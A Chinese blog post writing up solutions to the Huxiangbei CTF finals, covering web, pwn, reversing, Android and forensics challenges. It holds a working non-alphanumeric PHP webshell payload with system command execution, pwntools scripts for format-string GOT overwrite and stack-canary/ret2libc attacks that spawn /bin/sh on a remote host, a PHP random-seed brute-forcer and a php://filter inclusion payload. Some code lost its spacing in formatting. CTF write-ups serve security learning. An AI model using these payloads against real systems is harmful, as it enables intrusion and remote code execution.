聽說了很多的大牛的成長曆程都從寫自己的博客開始
雖然很久之前就開了博客但是沒有堅持下去,讓自己養成這樣的習慣。學着寫博客、學着分享。
每天儘量發一篇文章、其他學習文章隨着學習進度慢慢寫
今天還是有點累,沒有多學什麼東西,簡單的吧昨天湖湘杯writeup發出來分享一下吧~
簡單評價一下這次湖湘杯。。讓人感覺有點難受,不說初賽時候60秒一道選擇題。
複賽晚上十點結束還要4個小時內交writeup。。反正時間安排上感覺不是很友好
並且複賽題目emmmm原題佔大多數,因此相對而言比較容易,但有些題目還是很經典的
1、 題目名Web300
思路:代碼審計發現要求上傳的payload不能含有數字和字符,參考https://www.leavesongs.com/PENETRATION/webshell-without-alphanum.html
可以構造相應的payload
這裏我們構造了一個assert($_GET[_]);
將構造好的payload上傳
$_=[];
$_=''.[];
$_=$_['_'=='__'];
$___=$_;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__;
$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$____.=$__;
$_=$$____;
$___($_[_]);
之後?_=system(‘cat ../flag.php’); 查看源碼就有flag
2、 題目名 Encryptor.apk
將apk拖到apktool反編譯
其實直接逆向可以查看java代碼
分析一下代碼邏輯就是獲取輸入的密碼(默認是Password),然後md5處理,接着讀取文件,調用encryptbyte函數功能就是將文件按字節與md5處理後的Password異或。於是乎寫出逆算法就很簡單了
exp.py
f=open('flag.encrypted','rb')
fcon=f.read()
def xor(text,hash):
flag=''
fori in range(0,len(text)):
flag+= chr(ord(text[i])^hash)
returnflag
fo=open('flag.decrypt','w')
fo.write(xor(fcon,0xdc647eb65e6711e155375218212b3964))
最後得到flag flag{all_encryption_is_equal_but_some_are_More_equal_than_others}
3、 題目名 熱身運動
這個題目和實驗吧上的一個題目很像,根據每一幀的位置,聯想base64可以得到
B5 G4 B2 B4 B5 H2 E3 B2 F5 F8 E1 B2 F7 F6F1 G4 F5 G6 B1 G3 G5 H6 E2
25 38 49 33 25 55 44 49 29 5 60 49 13 21 61 38 29 22 57 46 30 23 52
ZmxhZ3sxdF8xNV9mdW5ueX0
正確padding一下base64解碼得到flag 'flag{1t_15_funny}'
4、 題目名 Misc 300
這道題目應該是pragyan-ctf-2016的原題,題目描述都沒有,上來就丟一個pixels.jpg.pkl。。原題描述是who-made-me
於是乎跑腳本
import pickle
from PIL import Image
with open('pixels.jpg.pkl') as f:
data= pickle.loads(f.read().encode('utf8'))
white_pixels = [(int(e[0]), int(e[1])) fore in data[1:]]
width = max([p[0] for p in white_pixels]) + 10
height = max([p[1] for p in white_pixels])+ 10
image = Image.new('1', (width, height), 0)
pixels = image.load()
for pixel in white_pixels:
pixels[pixel[0],pixel[1]] = 255
image.show()
出來一個圖片,動畫人物'Calvin and Hobbes'的作者是'Bill Watterson' flag billwatterson
5、 題目名 pwne
這道題很明顯是一個格式化字符串漏洞:
可以利用的函數
read(0, &buf, 64u);
printf(&buf);
可以leak棧地址,然後通過格式化字符串漏洞,寫atoi的got表地址從而發送/bin/sh
Exp關鍵部分
cv("[Y/N]")
sd("Y")
cv("NAME:")
sd("%p===%p+++%35$p---")
cv("WELCOME")
leakstack=cv("===")
cv("+++")
leaklibc=cv("---")
base = leaklibc -offset___libc_start_main_ret
system = base + offset_system
system = libc['system']
system_h = system&0xffff0000
system_l = system&0x0000ffff
system_h=system_h >> 16
atoi_got=0x804A02C
cv("AGE:")
padding="\00"*32
pay="90\00\00"+padding+p32(atoi_got)+p32(atoi_got+2)
sd(pay)
cv("[Y/N]")
sd("Y")
cv("NAME")
payload="%{systeml}c%16$hn%{systemh}c%17$hn".format(systeml=system_l,systemh=system_h-system_l)
sd(payload)
cv("AGE")
sd("/bin/sh\00")
cat flag
#52c12be949d88c14ccbe29d8733434c9
p.interactive()
6、 題目名 pwns
大致看一下題目可以判斷出先泄露stack canary,之後泄露libc。
#coding = utf-8
#code for pwns
from base64 import*
context.log_level= "debug"
local=False
name ="pwns"
if local:
p = process(name)
else:
p = remote("114.215.128.141 ",10080)
def sd(cont):
p.sendline(cont)
def cv(cont):
return p.recvuntil(cont)
if local:
offset___libc_start_main_ret = 0x18637
offset_system = 0x0003ada0
offset_dup2 = 0x000d6300
offset_read = 0x000d5af0
offset_write = 0x000d5b60
offset_str_bin_sh = 0x15b9ab
else:
offset___libc_start_main_ret = 0x19af3
offset_system = 0x00040310
offset_read = 0x000dd3c0
offset_write = 0x000dd440
offset_str_bin_sh = 0x162cec
defsenddata(payload, ath = False, final = False):
cv("[Y/N]")
sd("Y")
cv("datas:\n\n")
if ath:
attach()
p.send(b64encode(payload))
if not final:
cv("Result is:")
data = p.recvuntil("May beI",drop = True)
return data
else:
return
def getcanary():
slen = 0x10d - 0xc
payload = 'a' * slen
data = senddata(payload + 'a')
canary = data[258:261]
return canary
def getlibc():
slen = 0x10d - 0xc + 0x50
payload = 'a' * slen
data = senddata(payload)
leak = data[0x151:0x151 + 4]
return leak
canary = u32("\x00" +getcanary())
print "canary: ", hex(canary)
leak = u32(getlibc())
print "leak: ", hex(leak)
system_addr = leak -offset___libc_start_main_ret + offset_system
binsh_addr = leak -offset___libc_start_main_ret + offset_str_bin_sh
payload = 'a' * 0x101 + p32(canary) +p32(0xdeadbeef)*3 + p32(system_addr) + p32(0xdeadbeef) + p32(binsh_addr)
senddata(payload,final = True)
p.interactive()
7、 題目名 pyc分析
首先搜一下站長工具pyc反編譯
#!/usr/bin/env python
# encoding: utf-8
bbbb = (lambda __g, __y: continue[ [ [ [ [[ [ (fin.close(), [ [ ([], [])(((lambda __items, __after, __sentinel: (None,None, None, __y)((lambda __this: (lambda : (lambda __i: if __i is not__sentinel:
continue[ (ss.append(c), (sss.append(0),__this())[1])[1] for None in [
__i] ][0]None())(next(__items, __sentinel))
)
))()
), iter(s)), (lambda : continue[ [ (lambda__items, __after, __sentinel: (None, None, None, __y)((lambda __this: (lambda :(lambda __i: if __i is not __sentinel:
continue[ (lambda __value: continue[__this() for None in [
(lambda __ret: if __ret is NotImplemented:
__g['sssss'] +__value)(getattr(__g['sssss'], '__iadd__', (lambda other:NotImplemented))(__value))] ][0]
)(chr(c)) for None in [
__i] ][0]
return None()
)(next(__items, __sentinel))
)
))()
)((iter(ssss),), (lambda : continue[(fout.write(sssss), (fout.close(), None)[1])[1] for None in [
open('key.enc', 'wb+')] ][0]), []) for Nonein [
''] ][0] for None in [
encode(ss, sss)] ][0]
), []) for None in [
[]] ][0] for None in [
[]] ][0])[1] for None in [
fin.read().strip()] ][0] for None in [
open('key.txt', 'r')] ][0] for None in [
((lambda data, buf: (lambda __l: continue[ [ ([], [])(((lambda __items,__after, __sentinel: (None, None, None, __y)((lambda __this: (lambda : (lambda__i: if __i is not __sentinel:
continue[ [ __this() for None in [
table.index(__l['data'][__l['i']]) + 1]][0] for None in [
__i] ][0]None())(next(__items, __sentinel))
)
))()
), iter(xrange(__l['_len']))), (lambda :(lambda __items, __after, __sentinel: (None, None, None, __y)((lambda __this:(lambda : (lambda __i: if __i is not __sentinel:
continue[ [ [ __this() for None in [
setbit(__l['buf'], __l['i'],getbit(__l['data'], __l['j']))] ][0] for None in [
(__l['i'] / 6) * 8 + __l['i'] % 6] ][0] forNone in [
__i] ][0]None())(next(__items, __sentinel))
)
))()
)((iter(xrange(__l['_len'] * 6)),), (lambda: __l['buf']), [])
), []) for None in [
len(__l['data'])] ][0] forNone in [
(data, buf)] ][0]
)({ })
), 'encode')] ][0] for None in [
((lambda p, pos: (lambda __l: continue[ [ [ __l['p'][__l['cpos']]>> __l['bpos'] & 1 for None in [
__l['pos'] % 8] ][0] for None in [
__l['pos'] / 8] ][0] for None in [
(p, pos)] ][0])({ })
), 'getbit')] ][0] for None in [
((lambda p, pos, value: (lambda __l: continue[ [ [ (lambda __target,__slice, __value: continue[ (lambda __target, __slice, __value: continue[__l['p'] for None in [
(lambda __old: (lambda __ret: if __ret isNotImplemented:
__old | __value)(getattr(__old, '__ior__',(lambda other: NotImplemented))(__value))
)(__target[__slice])] ][0]
)(__l['p'], __l['cpos'], __l['value']<< __l['bpos']) for None in [
(lambda __old: (lambda__ret: if __ret is NotImplemented:
__old & __value)(getattr(__old,'__iand__', (lambda other: NotImplemented))(__value))
)(__target[__slice])] ][0]
)(__l['p'], __l['cpos'], ~(1 <<__l['bpos'])) for None in [
__l['pos'] % 8] ][0] forNone in [
__l['pos'] / 8] ][0] for Nonein [
(p, pos, value)] ][0]
)({ })
), 'setbit')] ][0] for None in [
string.printable.strip()] ][0] for None in [
__import__('string', __g, __g)] ][0]
)(globals(), (lambda f: ((lambda x:x(x)),)((lambda y: (f,)((lambda : y(y)()))
))
))
得到這些python源碼,看了一下應該是XDCTF2015的reverse
然後分析一下其中算法寫出exp.py
注意其中要將定義好的全局變量i和table添加到腳本當中跑出來的是key。。。真是無語,不是說好了flag形式麼。。
i = 654
table ='0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~'
def tobin(b):
ret=''
fori in [128,64,32,16,8,4,2,1]:
ret+= '1' if b&i else '0'
returnret
def decode3b(s):
a= s >> 16
b= (s >> 8) & 0xFF
c= s & 0xFF
sa= tobin(a)
sb= tobin(b)
sc= tobin(c)
returntable[int(sa[2:],2)]+table[int(sb[4:]+sa[:2],2)]+table[int(sc[6:]+sb[:4],2)]+table[int(sc[:6],2)]
a = open('key.enc','rb')
a = a.read()
s=''
for i in xrange(0,len(a),3):
s+=decode3b(int(a[i:i+3].encode('hex'),16))
print s
s=''.join(map(lambda c:table[(table.index(c)+63)%64],s))
print s
#hhhhhqqqqKeyd9733c070b2138e5fsssfffffff"""""""""""""
然後查看table[64]對應的{‘d’->’:’}於是乎最後key: 9733c070b2138e5f
8、 題目名 random
首先查看到網絡備份信息.index.php.swp最初的時候應該是htaccess配置問題導致備份文件無法查看,後來調整之後可以看到源碼了
Index.php
<?php
error_reporting(0);
$flag = "*********************";
echo "please input a rand_num !";
function create_password($pw_length = 10){
$randpwd= "";
for($i = 0; $i < $pw_length; $i++){
$randpwd.= chr(mt_rand(100, 200));
}
return$randpwd;
}
session_start();
mt_srand(time());
$pwd=create_password();
echo $pwd.'||';
if($pwd == $_GET['pwd']){
echo "first";
if($_SESSION['userLogin']==$_GET['login'])
echo "Nice , you get the flag it is".$flag ;
}else{
echo"Wrong!";
}
$_SESSION['userLogin']=create_password(32).rand();
?>
發現其實就是爆破一下pwd然後提交就可以了
寫一個php腳本本地執行一下
Exp.php
<?php
function create_password($pw_length = 10)
{
$randpwd = "";
for ($i = 0; $i < $pw_length; $i++)
{
$randpwd .= chr(mt_rand(100,200));
}
return $randpwd;
}
session_start();
for($i=time()-10;$i<time()+10;$i++)
{
mt_srand($i);
$pwd=create_password();
$curl=file_get_contents("http://114.215.138.89:10080/index.php?pwd=$pwd&login=");
echo $curl.'<br>';
}
?>
9、 題目名 web200
題目本意應該是文件上傳吧。。
首先掃後臺看見存在flag.php
但是應該出現了未知錯誤導致直接文件包含就可以,利用PHP僞協議
構造payload ?op=php://filter/read=convert.base64-encode/resource=flag
Base64解碼就出來了
>>> 'PD9waHAgCiRmbGFnPSJmbGFne2M0MjBmYjQwNTRIOTE5NDRhNzFmZjY4ZjcwNzliOTQyNGU1Y2JhMjF9ljsgCj8+Cg=='.decode('base64')
'<?php\n$flag="flag{c420fb4054H91944a71ff68f7079b9424e5cba21}\x96; \n?>\n'
10、 題目名 Re4newer
這是一道非常簡單的但是腦洞非常大的題目。。
直接upx脫殼,丟到ida中分析一下很明顯看到代碼邏輯,印象裏大致是對輸入字符串要求44位,然後每位異或0x22與指定字符串對比,寫出exp.py
得到一個很奇怪的字符串。。先進行了一下各種古典加密操作,感覺還是亂碼還以爲自己這麼簡單的題目還會寫錯。。結果經過隊友提醒,逆序一下看見了flag,四位一組組成自己能理解能認識的句子。。這種題目確實沒什麼好感。
text1=[0x13,0x4A,0x76,0x59,0x45,0x43,0x4E,0x44,0x52,0x4F,0x4B,0x51,0x54,0x7D,0x63,0x7D,0x5F,0x56,0x13,0x7D,0x67,0x67,0x70,0x70,0x70,0x7D,0x47,0x4E,0x71,0x4B,0x7D,0x51,0x71,0x51,0x63,0x52,0x7D,0x57,0x7D,0x67,0x7D,0x5B,0x50,0x11]
flag=''
for i in range(0,43):
flag+= chr(text1[i]^0x22)
print flag
#1hT{galfpmisv_A_}t1_EERRR_elSi_sSsAp_u_E_yr3
'''
flag
{Th1
s_iS
_A_v
3ry_
simp
le_R
RREE
E_u_
pAsS
_1t}
'''
#flag{Th1s_iS_A_v3ry_simple_RRREEE_u_pAsS_1t}
11、 題目名 簡單的android
Apktool直接解一下就出來了,明文字符串比較。。
12、 題目名 流量分析
拖到wireshark查看對象,分析http對象的時候發現了zip文件,導出解壓縮是個ce.txt很明顯是rgb
寫一個python腳本跑一下出來一張圖片
Exp.py
from PIL import Image
import re
import os
print os.getcwd()
x = 887
y = 111
image = Image.new("RGB",(x,y))
f = open('ce.txt')
for i in range(0,x):
for j in range(0,y):
l = f.readline()
r = l.split(", ")
image.putpixel((i,j),(int(r[0]),int(r[1]),int(r[2])))
image.save('image1.jpg')